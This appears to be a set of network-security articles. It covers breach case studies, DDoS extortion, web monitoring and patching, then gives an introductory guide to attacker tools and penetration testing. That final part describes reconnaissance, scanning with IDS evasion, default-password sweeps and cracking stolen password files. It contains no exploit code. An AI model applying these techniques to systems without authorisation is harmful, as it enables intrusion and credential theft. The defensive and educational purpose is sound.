In 2013, during the period 27th of November and 15th of December more than 98 million credit and debit card accounts were stolen from 1,787 Target stores across the United States. Hackers managed to install malware on Target’s computer systems to capture customers cards and then installed an exfiltration malware to move stolen credit card numbers to staging points around the United States in order to cover their tracks. The information was then moved to the hackers computers located in Russia.

The odd part in this security breach is that the infiltration was caught by FireEye – the $1.6 million dollar malware detection tool purchased by Target, however according to online sources, when the alarm was raised at the security team in Minneapolis, no action was taken as 40 million credit card numbers and 70 million addresses, phone numbers and other information was pulled out of Target’s mainframes!  [Source: Bloomberg website]

SQL Injections & Cross-Site Scripting are one of the most popular attack methods on Websites and Web Applications. Security tools such as Web Vulnerability Scanners allow us to uncover these vulnerabilities and fix them before hackers exploit them.

Implications for Organizations & Businesses

It goes without saying that organizations suffer major damages and losses when it comes to security breaches. When the security breaches happens to affect millions of users like the above examples, it’s almost impossible to calculate an exact dollar ($) figure.

Security Experts agree that data security breaches are among the biggest challenges organizations face today as the problem has both financial and legal implications.

Business Loss is the biggest contributor to overall data breach costs and this is because it breaks down to a number of other sub-categories, of which the most important are outlined below:

• Detection of the data breach. Depending on the type of security breach, the business can lose substantial amounts of money until the breach is successfully detected. Common examples are defaced website, customer orders and credit card information being redirected to hackers, orders manipulated or declined.
• Escalation Costs. Once the security breach has been identified, emergency security measures are usually put into action. This typically involves bringing in Internet security specialists, the cybercrime unit (police) and other forces, to help identify the source of the attack and damage it has caused. Data backups are checked for their integrity and everyone is on high-alert.
• Notification Costs. Customers and users must be notified as soon as possible. Email alerts, phone calls and other means are used to get in contact with the customers and request them to change passwords, details and other sensitive information. The company might also need to put together a special team that will track and monitor customer responses and reactions.
• Customer Attrition. Also known as customer defection. After a serious incident involving sensitive customer data being exposed, customers are more likely to stop purchasing and using the company’s services. Gaining initially a customer’s trust requires sacrifices and hard work – trying to re-gain it after such an incident means even more sacrifices and significantly greater costs. In many cases, customers choose to not deal with the company ever again, costing it thousands or millions of dollars.
• Legal Implications. In many cases, customers have turned against companies after their personal information was exposed by a security breach. Legal actions against companies are usually followed by lengthy law suites which end up costing thousands of dollars, not to mention any financial compensation that will be awarded to the end customers.  One example is Target’s security breach mentioned previously which is now facing multiple lawsuits from customers.

As outlined previously, the risk for organizations is high and there are a lot in stake from both, financial and legal prospective.  The security breach examples mentioned in this article make a good point on how big and serious a security breach can become, but also the implications for companies and customers. Our next article will focus on guidelines that can help us prevent data breaches and help our organization, company or business to deal with them.

The ancient maxim – prevention is better than cure – holds good in cyberspace as well, and it is prudent to detect beforehand signs of trouble, which if allowed to continue, might snowball into something uncontrollable. One of the best means of such prevention is through monitoring web traffic and to locate potential sources of trouble.

Even if attackers are unable to gain access to your network, they can still hold you to ransom by launching a Distributed Denial of Service or DDoS attack, wherein they choke the bandwidth of your network. Regular customers will not be able to gain access to your servers. Generally downtime for any company these days translates to loss of income and damage to the company’s reputation. Attackers these days might also refuse to relent until a ransom amount is paid up. Sounds a bit too far-fetched? Not really.

Live Attacks & Hacking Attempts On The Internet

It’s hard to image what really is happening right now on the Internet: How many attacks are taking place, the magnitude of these attacks, the services used to launch attacks, attack origins, attack targets and much more.  Hopefully we’ll be able to help change than for you right now…

The screenshot below was taken after monitoring the Norse network which collects and analyzes live threat intelligence from darknets in hundreds of locations in over 40 countries. The attacks are taken from a small subset of live flows against the Norse honeypot infrastructure and represent actual worldwide cyber-attacks:

Click to enlarge

In around 15 minutes of monitoring attacks, we saw more than 5000 different origins launching attacks to over 5800 targets, of which 99% of the targets are located in the United States and 50% of the attack origins were from China.

The sad truth is that the majority of these attacks are initiated from compromised computer systems & servers, with unrestricted web access. All it takes today is for one system to visit an infected site and that could be enough to bring down the whole enterprise network infrastructure while at the same time launch a massive attack against Internet targets.

In June 2014, Evernote and Feedly, working largely in tandem, went down with a DDoS attack within two days of each other. Evernote recovered the same day, but Feedly had to suffer more. Although there were two more DDoS attacks on Feedly that caused it to lose business for another two days, normalcy was finally restored. According to the CEO of Feedly, they refused to give in to the demands of ransom in exchange for ending the attack and were successful in neutralizing the threat.

Domino's Pizza had over 600,000 Belgian and French customer records stolen by the hacking group Rex Mundi. The attackers demanded $40,000 from the fast food chain in exchange for not publishing the data online. It is not clear whether Domino's complied with the ransom demands. However, they reassured their customers that although the attackers did have their names, addresses and phone numbers, they however, were unsuccessful in stealing their financial and banking information. The Twitter account of the hacking group was suspended, and they never released the information.

Apart from external attacks, misbehavior from employees can cause equal if not greater damage. Employees viewing pornographic material in the workspace can lead to a huge number of issues. Not only is porn one of the biggest time wasters, it chokes up the network bandwidth with non-productive downloads, including bringing in unwanted virus, malware and Trojans. Co-workers unwillingly exposed to offensive images can find the workplace uncomfortable and this may further lead to charges of sexual harassment, dismissal and lawsuits, all expensive and disruptive.

Another major problem is data leakage via e-mail or webmail – intended or by accident. Client data, unreleased financial data and confidential plans leaked through emails may cause devastating impact to the business including loss of client confidence.

Web monitoring provides answers to several of these problems. This type of monitoring need not be very intrusive or onerous, but with the right policies and training, employees easily learn to differentiate between appropriate and inappropriate use.

Few Of The Biggest Web Problems

To monitor the web, you must know the issues that you need to focus on. Although organizations differ in their values, policies and culture, there are some common major issues on the Web that cause the biggest headaches:

• Torrents And Peer-To-Peer Networks offer free software, chat, music and video, which can be easily downloaded. However, this can hog the bandwidth causing disruptions in operation such as for video conferencing and VoIP. Moreover, such sites also contain pirated software, bootlegged movies and inappropriate content that are mostly tainted with various types of virus and Trojans.
• Gaming sites are notorious for hogging bandwidth and wasting productive time. Employees often find these sites hard to resist and download games. Most of the games carry lethal payloads of virus and other malware, with hackers finding them a common way for SEO poisoning. Even when safe, games disrupt productivity and clog the network.
• Fun sites, although providing a harmless means of relieving stress, may be offensive and inappropriate to coworkers. Whether your policies allow such humor sites, they can contain SEO poisoned links and Trojans, often clogging networks with their video components.
• Online Shopping may relate to purchase of work-appropriate items as well as personal. Although the actual purchase may not take up much time, surfing for the right product is a huge time waster, especially for personal items. Individual policies may either limit the access to certain hours of the day or block these sites altogether.
• Non-Productive Surfing can be a huge productivity killer for any organization. Employees may be obsessed with tracking shares, sports news or deals on commercial sites such as Craigslist and eBay. Company policies can block access to such sites entirely, or limit the time spent on such sites to only during lunchtime.

According to a survey involving over 3,000 employees, Salary.com found over 60% involved in visiting sites unrelated to their work every day. More than 20% spent above five hours a week on non-work related sites. Nearly half of those surveyed looked for a new job using office computers in their work time.

In the next part of our article, we will examine the importance of placing a company security policy to help avoid users visiting sites they shouldn't, stop waisting valuable time and resources on activities that can compromise the enterprise's network security and more. We also take an in-depth look on how to effectively monitor and control traffic activity on the Web in real-time, plus much more.

Each year software giants release new systems that bring new features and functionality to Enterprise and SMB companies aiming to increase collaboration, productivity, and generally make life easier for everyone, except IT Managers, System Engineers and Administrators.

Unfortunately history has proven many times in the past that new operating systems and applications are often bundled with a generous amount of security issues which are usually detected after a security incident.

Almost every company, regardless of its size, whether large or small, has faced data breaches and had important data, personal records and financial information stolen. Sadly, most companies never even know about the data breach until it's too late!

For example, in May 2014, the notorious Syrian Electronic Army attacked and successfully stole credentials from eBay. They managed to steal personal records of over 230 million users, compromising usernames, passwords, phone numbers and physical addresses, leaving eBay users vulnerable to identity theft.

Did you know that the PCI Data Security Standard (PCI DSS) provides a framework for developing a robust data security process - including prevention, detection and appropriate reaction to security incidents?

Last month, a huge data breach at P. F. Chang's, the famous chain restaurant, compromised payment information of their customers. Criminals hacked more than 33 restaurants between October 2013 and June 2014 at P. F. Chang's and managed to record the data belonging to an unestimated number of credit and debit cards used at the restaurant's locations. Subsequently, these newly stolen credit and debit cards were put up for sale on the black market. The identity of the attackers is yet to be worked out, and worst of all, P. F. Chang was alerted in June 2014 by the US Secret Service about the data breach! It seems like they were totally unaware of what was happening for a period of over 9 months!

A majority of the machines had data successfully siphoned off them because they had a common problem – they were not fully patched. It is suspected that software used in the machines had vulnerabilities and attackers used the security holes to enter and steal information. Patches are meant to fix flaws in the software, preventing attackers from gaining access through the flaws. However, applying patches in time is something that most users typically delay. The patching cycle too, adds to the security problems.

Typically, vendors issue patches as they discover vulnerabilities in their software. Sometimes, security experts discover a flaw in software and publicize it even before the vendor has had time to come up with a fix. This makes all machines using the software vulnerable to attack.

Furthermore, the very act of announcing a patch makes machines vulnerable until the patch has actually been applied. There is usually a time lag between the announcement of the patch, acquiring it and applying it. Very few people actually apply the patch as soon as it is released, sometimes as an oversight, but mostly delayed - to test if the patch does not cause their business processes to break down.

Attackers make use of this time lag to exploit exposed vulnerabilities. As most attackers take the path of the least resistance, they scan machines until they have located one that has not yet been patched and they get in. Therefore, if you put more effort in patching up front, not only do you keep your own machines protected and up-to-date, your users also remain safe from sundry attackers.

To defeat the attacker successfully, the organization needs to be adequately prepared. The process of securing information is not a static goal, but has to be treated as a dynamic process that requires flexible, skilled and disciplined management with a response cycle that ensures continuous improvement.

Following are a few simple rules that help make the process much easier to handle:

A Systematic Approach

Patching requires the IT team to be ever vigilant and thoroughly systematic. To begin with, everyone must realize the importance of patching and the team effort should generate unselfish cooperation. In today's scenario, apart from the Operating System, software tools from several vendors are also used simultaneously. Therefore, apart from the patches and updates for Windows from Microsoft, the IT team may also have to handle fixes from vendors such as Adobe and other vendors. Relying on updates from the vendors may not be enough - the IT team must also look out for white papers and other product reviews published independently.

Manage Your Assets

Inventory your tools and systems to know what you have. Asset management makes it easier for your IT team to know width of the patch management it has to tackle. The team must be abreast of the installation of any new application, service pack and patch, which makes this an all-time job.

Organize Your Processes

Although there are many good tools for patch management, it still requires the complex process to be handled smartly, with a right strategy and with proper teamwork. If your organization is highly centralized, the IT team can work as a core group, performing the entire asset management and determining the needs and priorities of patching, including testing and rollout.

For geographically distributed organizations, several local IT groups may be the norm. Although communication between the individual groups is important, each group must acquire their own tools and gain independent patching expertise.

Proper patch management requires the IT team to be fully in control while end users are discouraged from doing their own patching, unless IT has provided them with detailed instructions and training for patching.

Automate Your Processes

Nowadays, there are a few good tools available for patch management that can automate the process of patching and they work on multiple platforms. Automating the process relieves the IT team from the tedious process of having to manually test and install each patch.

IT can set the automatic functions to scour for new patches constantly and organize the patches by their importance. They can also automate the process of mapping the company's vulnerabilities according to their priorities against the patches available. This provides them with a clear roadmap of what to patch and in what sequence.

It is evident that companies of every size should give high-priority in correctly patching their systems. Keeping systems up-to-date has proven to be an effective method against targeted attacks seeking to exploit vulnerable systems. Our next article focuses on additional ways to help simplify the patching process for companies. Click Here to read Protecting Enterprise & SMB Networks From Exploits, Hacking & Attacks By Correctly Patching Systems - Part 2.

I’m sure most readers will agree when I say that end-users are usually responsible for attacks that originate from the internal network infrastructure. A frequent example is when users find a link while browsing the Internet they tend to click on it to see where it goes even if the context suggests that the link may be malicious. Users are unaware of the hidden dangers and the potential damage that can be caused by clicking on such links.

The implications of following links with malicious content can vary for each company, however, we outline a few common cases often seen or read about:

• Hijacking of the company’s VoIP system, generating huge bills from calls made to overseas destination numbers (toll fraud)
• The company’s servers are overloaded by thousands of requests made from the infected workstation(s)
• Sensitive information is pulled from the workstations and sent to the hackers
• Company Email servers are used to generate and send millions of spam emails, eventually placing them on a blacklist and causing massive communication disruptions
• Remote control software is installed on the workstations, allowing hackers to see everything the user is doing on their desktop
• Torrents are downloaded and seeded directly from the company’s Internet lines, causing major WAN disruptions and delays

As you can see there are countless examples we can analyze to help us understand how serious the problem can become.

Download this whitepaper if you are interested to:

• Learn which are the Top 10 Dangerous sites users visit
• Learn the Pros and Cons of each website category
• Understand why web content filtering is important
• Learn how to effectively block sites from compromising your network
• Learn how to limit the amount of the time users can access websites
• Effectively protect your network from end-user ‘mistakes’
• Ensure user web-browsing does not abuse your Internet line or Email servers

We apologise however the whitepaper is no longer available by the vendor.  Head to our homepage to read up on new network and security related articles.

Download this whitepaper if you’re interested to:

• Learn on how to adopt best practices and boost your business security.
• Evaluate the SMB digital footprint.
• Know what to look for in new security solutions.

We apologise however the whitepaper is no longer available by the vendor.  Head to our homepage to read up on new network and security related articles.

On a larger scale, our road traffic system, security CCTV, air traffic control, power stations, nuclear power plants, financial institutions and even certain military assets are administered using networks. We are all part of this great cyber space. But how safe are we? What is our current level of vulnerability?

Tower, Am I Cleared For Landing?

March 10, 1997: It was a routine day of activity at Air Traffic Control (ATC) at Worcester, Massachusetts, with flight activity at its peak. Suddenly the ground to air communications system went down. This meant that ATC could not communicate with approaching aircraft trying to land. This was a serious threat to all aircraft and passengers using that airport. All incoming flights had to be diverted to another airport to avoid a disaster.

This mayhem was caused by a 17 year old hacker named Jester. He had used a normal telephone line and physically tapped into it, giving him complete control of the airport’s entire communications system. His intrusion was via a telephone junction box, which in turn ended up being part of a high end fire backbone. He was caught when, directed by the United States Security Service, the telephone company traced the data streams back to the hacker’s parents’ house. Jester was the first juvenile to be charged under the Computer Crimes Law.

As our world becomes more and more computerised and our computer systems start interconnecting, the level of vulnerability goes up. But should this mean an end to all advancement in our lives? No. We need to make sure we are safe and the things that make our lives easier and safer are also secure.

Intruder Alert

April 1994: An US Airforce Base realised that their high level security network was not just hacked, but secure documents were stolen. This resulted in an internal cyber man-hunt. The bait was laid and all further intrusions were monitored. A team of 50 Federal Agents finally tracked down 2 hackers who were using US based social networking systems to hack into the Airforce Base. But it was later revealed that the scope of intrusion was not just limited to the base itself: they had infiltrated a much bigger military organisation. The perpetrators were hackers with the aliases of ‘datastreamcowboy’ and ‘kuji’.

‘Datastreamcowboy’ was a 16 year old British national who was apprehended on May 4^th 1994, and ‘kuji’ was a 21 year old technician named Mathew Bevan from Cardiff, Wales. ‘datastreamcowboy’ was like an apprentice to ‘kuji’. ‘datastreamcowboy’ would try a method of intrusion and, if he failed, he would go back to ‘kuji’ for guidance. ‘kuji’ would mentor him to a point that on subsequent attempts ‘datastreamcowboy’ would succeed.

What was their motive? Bragging rights in the world of hacking for being able to penetrate the security of the holy grail of all hackers: the Pentagon.

But the future might not see such benign motives at play. As command and control of military installations is becoming computerised and networked, it has become imperative to safeguard against intruders who might break into an armoury with the purpose of causing damage to it or to control and use it with malice.

Social Virus

October 2005: The social networking site MySpace was crippled by a highly infectious computer virus. The virus took control of millions of online MySpace profiles and broadcasted the hacker’s messages. The modus operandi of the hacker was to place a virus on his own profile. Whenever someone visited his profile page, he/she would be infected and their profile would show the hacker’s profile message. These new users now being infected would spread the infection through their friends on MySpace, and this created a massive chain reaction within the social network community. The mass infection caused the entire MySpace social network to grind to a halt.

Creator of this mayhem was Sammy Kamkar, a 19 year old. But his attack was not very well organised as he left digital footprints and was later caught. Banned from using a computer for 3 years, he later became a security consultant helping companies and institutions safeguard themselves against attacks.

What that showed the world was the fact that a cyber attack could come from anywhere, anytime.

In our current digital world we already know that a lot of our complex systems like Air Traffic Control, power stations, dams, etc are controlled and monitored using computers and networks. Let’s try to understand the technology behind it to gauge where the security vulnerabilities come from.

SCADA: Observer & Controller

Over the last few decades, SCADA technology has enabled us to have greater control over predominantly mechanical systems which were, by design, very isolated. But what is SCADA? What does it stand for?

SCADA is an acronym for Supervisory Control And Data Acquisition. A quick search on the internet and you would find the definition to be as follows:

SCADA (supervisory control and data acquisition) is a type of industrial control system (ICS). Industrial control systems are computer controlled systems that monitor and control industrial processes that exist in the physical world. SCADA systems historically distinguish themselves from other ICS systems by being large scale processes that can include multiple sites and large distances. These processes include industrial, infrastructure, and facility-based processes as described below:

• Industrial processes include those of manufacturing, production, power generation, fabrication and refining, and may run in continuous, batch, repetitive, or discrete modes.
• Infrastructure processes may be public or private and include water treatment and distribution, wastewater collection and treatment, oil and gas pipelines, electrical power transmission and distribution, wind farms, civil defence siren systems and large communication systems.
• Facility processes occur both in public facilities and private ones, including buildings, airports, ships, and space stations. They monitor and control heating, ventilation and air conditioning systems (HVAC), access and energy consumption.

This effectively lets us control the landing lights on a runway, gates of a reservoir or a dam, connection and disconnection of power grids to a city supply.

Over the last decade all such systems have become connected to the internet. However, when SCADA was being developed no thought was given to security. No one imagined that a SCADA based system would end up on the internet. Functionality and convenience were given higher priority and security was ignored, hence SCADA carries the burden of inherent security flaws.

Tests have been performed extensively to map the vulnerabilities of a networked SCADA system. A test was done on a federal prison which used SCADA to control gates and security infrastructure. Within two weeks, a test hacker had full control of all the cell doors. The kit the hacker used was purchased from the open market for a value as low as $2500.

But, thankfully, more and more thought is given today when designing a SCADA based system which will be used over a network. Strict security policies and intrusion detection and avoidance technologies are implemented.

Where’s My Money?

The year 1994 – 1995 saw a momentous change in our financial industry: the entire financial sector was now online. Paper transactions were a thing of the past. Vast sums of money now change location in a matter of milliseconds. The share markets, along with complex monetary assets, now trade using the same cyber space which we use for social networking, shopping etc. As this involved a lot of money, money being transferred in unimaginable amounts, the financial industry, especially banks, went to great lengths to protect themselves.

As happens in our physical world with the advent of better locks thieves change their ways to adapt as well. Hackers have developed tools that can bypass encryptions to steal funds, or even hold an entire institution to ransom. Average annual loss due to cyber heist has been estimated at nearly 1.3 million dollars. Since banks hardly hold any cash in their branches your ordinary bank robbery would hardly amount to $6000 – $8000 in hard cash.

Cyber heist is a criminal industry with staggering rewards. The magnitude is in hundreds of billions of dollars. But most cyber intrusions in this industry go unreported because of its long term impact on the compromised institution’s reputation and credibility.

Your Card Is Now My Card!

2005: Miami, Florida. A Miami hacker made history in cyber theft. Alberto Gonzales would drive around Miami streets looking for unsecured wireless networks. He hooked onto the unsecure wireless network of a retailer, used it to reach the retailer’s headquarters and stole credit card numbers from its databases. He then sold these card details to Eastern European cyber criminals. In the first year, he stole 11.2 million card details. By the end of the second year he had stolen about 90 million card details.

He was arrested in July 2007 while trying to use one of these stolen cards. On subsequent interrogation it was revealed that he had stored away 43 million credit card details on servers in Latvia and Ukraine.

In recent times we know a certain gaming console organisation had its online gaming network hacked and customer details stolen. For that organisation, the security measures taken subsequent to that intrusion were ‘too little too late’, but all such companies that hold customer credit card details consequently improved their network security setup.

Meltdown By Swatting

January 2005: A hacker with the alias ‘dshocker’ was carrying out an all out attack on several big corporations in the US. He used stolen credit cards to fund his hacking activities. He managed to break through a firewall and infect large numbers of computers. This enabled him to take control of all of those machines and use their collective computing power to carry out a Denial of Service Attack on the corporation itself. The entire network went into a meltdown. Then he did something that is known today as ‘swatting’. Swatting is an action that dupes the emergency services into sending out an emergency response team. This false alarm and follow up raids would end up costing the civic authorities vast sums of money and resources.

He was finally arrested when his fraudulent credit card activities caught up with him.

Playing Safe In Today’s World

Today technology is a great equaliser. It has given the sort of power to individuals that only nations could boast of in the past. All the network intrusions and their subsequent effects can be used individually or together to bring a nation to its knees. The attackers can hide behind the cyber world and their attacks can strike anyone without warning. So what we need to do is to stay a step ahead.

We can’t abolish using the network, the cloud or the things that have given us more productivity and efficiency. We need to envelop ourselves with stricter security measures to ensure that all that belongs to us is safe, and amenities used by us everyday are not turned against us. This goes for everyone, big organisations and the individual using his home network.

At home, keep your wireless internet connection locked down with a proper password. Do not leave any default passwords unchanged. That is a security flaw that can be taken advantage of. On your PCs and desktops, every operating system comes with its own firewall. Keep it on. Turning it off for convenience will cost you more than keeping it on and allowing only certain applications to communicate safely with the internet. In your emails, if you don’t recognise a sender’s email, do not respond or click on any of the links it may carry. These can be viruses ready to attack your machines and create a security hole through which the hacker will enter your home network. And for cyber’s sake, please, you haven’t won a lottery or inherited millions from a dead relative. So all those emails telling you so are just fakes. They are only worth deleting.

The simple exercise of keeping your pop-up blocker turned on will keep your surfing through your browser a lot safer. Your operating system, mainly Windows and Linux, lets you keep a guest account so whenever a ‘guest’ wants to check his/her emails or surf the web have them use this account instead of your own. Not that you don’t trust your guest but they might innocently click on something while surfing and not know what cyber nastiness they have invited into your machine. The guest account has  minimal privileges for users so it can be safe. Also, all accounts must have proper passwords. Don’t let your machine boot up to an administrator account with no password set. That is a recipe for disaster. Don’t use a café’s wireless network to check your bank balance. That can wait till you reach home. Or just call the bank up. That’s safer.

At work, please don’t plug an unauthorised wireless access point into your corporate network, this can severely compromise it. Use strong passwords for accounts, remove old accounts not being used. Incorporate strong firewall rules and demarcate effective DMZ so that you stay safer. Stop trying to find a way to jump over a proxy, or disable it. You are using company time for a purpose that can’t be work related. If it is needed, ask the network administrator for assistance.

I am not an alarmist, nor do I believe in sensationalism. I believe in staying safe so that I can enjoy the fruits of technology. And so should you, because you deserve it.

Readers can also visit ourNetwork Security section which offers a number of interesting articles covering Network Security.

About the Writer

Arani Mukherjee holds a Master’s degree in Distributed Computing Systems from the University of Greenwich, UK and works as network designer and innovator for remote management systems, for a major telecoms company in UK. He is an avid reader of anything related to networking and computing. Arani is a highly valued and respected member of Firewall.cx, offering knowledge and expertise to the global community since 2005.

• Tools and Attacker Uses
• General Network Tools
• Exploits
• Port Scanners
• Network Sniffers
• Vulnerability Scanners
• Password Crackers
• What is Penetration Testing
• More Tools
• Common Exploits
• A Brief Walk-through of an Attack
• and more.

Tools An Attacker Uses

Now that we've concluded a brief introduction to the types of threats faced by both home users and the enterprise, it is time to have a look at some of the tools that attackers use.

Keep in mind that a lot of these tools have legitimate purposes and are very useful to administrators as well. For example I can use a network sniffer to diagnose a low level network problem or I can use it to collect your password. It just depends which shade of hat I choose to wear.

General Network Tools

As surprising as it might sound, some of the most powerful tools especially in the beginning stages of an attack are the regular network tools available with most operating systems. For example and attacker will usually query the 'whois' databases for information on the target. After that he might use 'nslookup' to see if he can transfer the whole contents of their DNS zone (called a zone transfer -- big surprise !!). This will let him identify high profile targets such as webservers, mailservers, dns servers etc. He might also be able to figure what different systems do based on their dns name -- for example sqlserver.victim.com would most likely be a database server. Other important tools include traceroute to map the network and ping to check which hosts are alive. You should make sure your firewall blocks ping requests and traceroute packets.

Exploits

An exploit is a generic term for the code that actually 'exploits' a vulnerability in a system. The exploit can be a script that causes the target machine to crash in a controlled manner (eg: a buffer overflow) or it could be a program that takes advantage of a misconfiguration.

A 0-day exploit is an exploit that is unknown to the security community as a whole. Since most vulnerabilities are patched within 24 hours, 0-day exploits are the ones that the vendor has not yet released a patch for. Attackers keep large collections of exploits for different systems and different services, so when they attack a network, they find a host running a vulnerable version of some service and then use the relevant exploit.

Port Scanners

Most of you will know what portscanners are. Any system that offers TCP or UDP services will have an open port for that service. For example if you're serving up webpages, you'll likely have TCP port 80 open, FTP is TCP port 20/21, Telnet is TCP 23, SNMP is UDP port 161 and so on.

A portscanner scans a host or a range of hosts to determine what ports are open and what service is running on them. This tells the attacker which systems can be attacked.
For example, if I scan a webserver and find that port 80 is running an old webserver -- IIS/4.0, I can target this system with my collection of exploits for IIS 4. Usually the port scanning will be conducted at the start of the attack, to determine which hosts are interesting.

This is when the attacker is still footprinting the network -- feeling his way around to get an idea of what type of services are offered and what Operating Systems are in use etc. One of the best portscanners around is Nmap (https://www.insecure.org/nmap). Nmap runs on just about every operating system is very versatile in how it lets you scan a system and has many features including OS fingerprinting, service version scanning and stealth scanning. Another popular scanner is Superscan (https://www.foundstone.com) which is only for the windows platform.

Network Sniffers

A network sniffer puts the computers NIC (network interface card or LAN card) into 'promiscuous mode'. In this mode, the NIC picks up all the traffic on its subnet regardless of whether it was meant for it or not. Attackers set up sniffers so that they can capture all the network traffic and pull out logins and passwords. The most popular network sniffer is TCPdump as it can be run from the command line -- which is usually the level of access a remote attacker will get. Other popular sniffers are Iris and Ethereal.

When the target network is a switched environment (a network which uses layer 2 switches), a conventional network scanner will not be of any use. For such cases, the switched network sniffer Ettercap (http://ettercap.sourceforge.net) and WireShark (https://www.wireshark.org) are very popular. Such programs are usually run with other hacking capable applications that allow the attacker to collect passwords, hijack sessions, modify ongoing connections and kill connections. Such programs can even sniff secured communications like SSL (used for secure webpages) and SSH1 (Secure Shell - a remote access service like telnet, but encrypted).

Vulnerability Scanners

A vulnerability scanner is like a portscanner on steroids, once it has identified which services are running, it checks the system against a large database of known vulnerabilities and then prepares a report on what security holes are found. The software can be updated to scan for the latest security holes. These tools are very simple to use unfortunately, so many script kiddies simply point them at a target machine to find out what they can attack. The most popular ones are Retina (http://www.eeye.com), Nessus (http://www.nessus.org) and GFI LanScan (http://www.gfi.com). These are very useful tools for admins as well as they can scan their whole network and get a detailed summary of what holes exist.

Password Crackers

Once an attacker has gained some level of access, he/she usually goes after the password file on the relevant machine. In UNIX like systems this is the /etc/passwd or /etc/shadow file and in Windows it is the SAM database. Once he gets hold of this file, its usually game over, he runs it through a password cracker that will usually guarantee him further access. Running a password cracker against your own password files can be a scary and enlightening experience. L0phtcrack cracked my old password fR7x!5kK after being left on for just one night !

There are essentially two methods of password cracking :

Dictionary Mode - In this mode, the attacker feeds the cracker a word list of common passwords such as 'abc123' or 'password'. The cracker will try each of these passwords and note where it gets a match. This mode is useful when the attacker knows something about the target. Say I know that the passwords for the servers in your business are the names of Greek Gods (yes Chris, that's a shout-out to you ;)) I can find a dictionary list of Greek God names and run it through the password cracker.

Most attackers have a large collection of wordlists. For example when I do penetration testing work, I usually use common password lists, Indian name lists and a couple of customized lists based on what I know about the company (usually data I pick up from their company website). Many people think that adding on a couple of numbers at the start or end of a password (for example 'superman99') makes the password very difficult to crack. This is a myth as most password crackers have the option of adding numbers to the end of words from the wordlist. While it may take the attacker 30 minutes more to crack your password, it does not make it much more secure.

Brute Force Mode - In this mode, the password cracker will try every possible combination for the password. In other words it will try aaaaa, aaaab, aaaac, aaaad etc. this method will crack every possible password -- its just a matter of how long it takes. It can turn up surprising results because of the power of modern computers. A 5-6 character alphanumeric password is crackable within a matter of a few hours or maybe a few days, depending on the speed of the software and machine. Powerful crackers include l0phtcrack for windows passwords and John the Ripper for UNIX style passwords.

For each category, I have listed one or two tools as an example. At the end of this article I will present a more detailed list of tools with descriptions and possible uses.

What is Penetration-Testing?

Penetration testing is basically when you hire (or perform yourself) security consultants to attack your network the way an attacker would do it, and report the results to you enumerating what holes were found, and how to fix them. It's basically breaking into your own network to see how others would do it.

While many admins like to run quick probes and port scans on their systems, this is not a penetration test -- a penetration tester will use a variety of specialised methods and tools from the underground to attempt to gain access to the network. Depending on what level of testing you have asked for, the tester may even go so far as to call up employees and try to social engineer their passwords out of them (social engineering involves fooling a mark into revealing information they should not reveal).

An example of social engineering could be an attacker pretending to be someone from the IT department and asking a user to reset his password. Penetration testing is probably the only honest way to figure out what security problems your network faces. It can be done by an administrator who is security aware, but it is usually better to pay an outside consultant who will do a more thorough job.

I find there's a lack of worthwhile information online about penetration testing -- nobody really goes about describing a good pen test, and what you should and shouldn't do. So I've hand picked a couple of good papers on the subject and then given you a list of my favourite tools, and the way I like to do things in a pen-test.

This is by no means the only way to do things, it's like subnetting -- everyone has their own method -- this is just a systematic approach that works very well as a set of guidelines. Depending on how much information you are given about the targets as well as what level of testing you're allowed to do, this method can be adapted.

Papers Covering Penetration Testing

I consider the following works essential reading for anyone who is interested in performing pen-tests, whether for yourself or if you're planning a career in security:

'Penetration Testing Methodology - For Fun And Profit' - Efrain Tores and LoNoise, you can google for this paper and find it.

'An Approach To Systematic Network Auditing' - Mixter (http://mixter.void.ru)

'Penetration Testing - The Third Party Hacker' - Jessica Lowery. Boy is this ever a good paper ! (https://www.sans.org/rr/papers/index.php?id=264)

'Penetration Testing - Technical Overview' - Timothy P. Layton Sr. also from the www.sans.org (https://www.sans.org) reading room

Pen-test Setup

I don't like working from laptops unless its absolutely imperative, like when you have to do a test from the inside. For the external tests I use a Windows XP machine with Cygwin (www.cygwin.com) and VMware (www.vmware.com) most linux exploits compile fine under cygwin, if they don't then I shove them into vmware where I have virtual machines of Red Hat, Mandrake and Win2k boxes. In case that doesnt work, the system also dual boots Red Hat 9 and often I'll just work everything out from there.

I feel the advantage of using a microsoft platform often comes from the fact that 90% of your targets may be microsoft systems. However the flexibility under linux is incomparable, it is truely the OS of choice for any serious hacker.. and as a result, for any serious security professional. There is no best O/S for penetration testing -- it depends on what you need to test at a point in time. That's one of the main reasons for having so many different operating systems set up, because you're very likely to be switching between them for different tasks.

If I don't have the option of using my own machine, I like to choose any linux variant.
I keep my pen-tests strictly to the network level, there is no social engineering involved or any real physical access testing other than basic server room security and workstation lockdown (I don't go diving in dumpsters for passwords or scamming employees).

I try as far as possible to determine the Rules Of Engagement with an admin or some other technically adept person with the right authorisation, not a corporate type. This is very important because if you do something that ends up causing trouble on the network, its going to make you look very unprofessional. It's always better to have it done clearly in writing -- this is what you are allowed to do.

I would recommend this even if you're an admin conducting an in-house test. You can get fired just for scanning your own network if its against your corporate policy. If you're an outside tester, offer to allow one of their people to be present for your testing if they want. This is recommended as they will ultimately be fixing most of these problems and being in-house people they will be able to put the results of the test in perspective to the managers.

Tools

I start by visiting the target website, running a whois, DNS zone transfer (if possible) and other regular techniques which are used to gather as much network and generic information about the target. I also like to pick up names and email addresses of important people in the company -- the CEO, technical contacts etc. You can even run a search in the newsgroups for @victim.com to see all the public news postings they have made. This is useful as a lot of admins frequent bulletin boards for help. All this information goes into a textfile. Keeping notes is critically important, it's very easy to forget some minor detail that you should include in your end report.

Now for a part of the arsenal -- not in any order and far from the complete list.

Nmap - Mine (and everyone elses) workhorse port scanner with version scanning, multiple scan types, OS fingerprinting and firewall evasion tricks. When used smartly, Nmap can find any Internet facing host on a network.

Nessus - My favourite free vulnerability scanner, usually finds something on every host. Its not too stealthy though and will show up in logs (this is something I don't have to worry about too much).

Retina - A very good commercial vulnerability scanner, I stopped using this after I started with nessus but its very very quick and good. Plus its vulnerability database is very up-to-date.

Nikto - This is a webserver vulnerability scanner. I use my own hacked up version of this perl program which uses the libwhisker module. It has quite a few IDS evasion modes and is pretty fast. It is not that subtle though, which is why I modified it to be a bit more stealthy.

Cisco Scanner - This is a small little windows util I found that scans IP ranges for routers with the default password of 'cisco'. It has turned up some surprising results in the past and just goes to show how even small little tools can be very useful. I am planning to write a little script that will scan IP ranges looking for different types of equipment with default passwords.

Sophie Script - A little perl script coupled with user2sid and sid2user (two windows programs) which can find all the usernames on a windows machine.

